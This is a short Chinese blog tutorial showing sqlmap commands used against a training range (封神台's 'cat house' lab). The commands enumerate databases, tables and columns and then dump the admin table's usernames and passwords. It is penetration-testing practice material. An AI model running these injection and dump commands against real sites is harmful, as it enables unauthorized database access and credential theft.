使用案例靶場為上篇文章介紹的封神台---靶場 https://hack.zkaq.cn/ 提示:采用開源靶場里面的貓舍進行滲透注入,僅用於安全防范無安全侵犯
1、首先檢測是否已經安裝成功sqlmap.py開源工具:
sqlmap.py -h (-h 為 help幫助的縮寫)
由於我安裝了python3.9且將python3.9目錄下的python.exe改為了python3.exe,所以每次都要攜帶python。。。如果僅僅安裝python2.X則不需要帶python 輸入命令后出現下面的則證明安裝成功且能夠正常調用。
2、直接爆庫
sqlmap.py -u "URL" --dbs --batch(可以直接查看當前使用那些數據庫)
3、通過庫進行爆表
sqlmap.py -u "URL" -D 庫名 --tables --batch (直接能夠爆出庫中的所有表)
4、直接爆表中的字段以及類型:
sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin --columns --batch
5、直接爆表中的會員賬戶號以及密碼:
sqlmap.py -u "http://rhiq8003.ia.aqlab.cn/?id=1" -D maoshe -T admin -C Id,password,username --dump
爆破成功,更多安全性問題關注博主,后期更新